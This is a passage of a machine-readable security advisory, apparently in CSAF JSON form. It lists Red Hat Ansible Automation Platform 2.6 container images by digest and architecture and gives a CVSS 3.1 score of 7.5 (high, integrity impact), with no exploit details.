"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
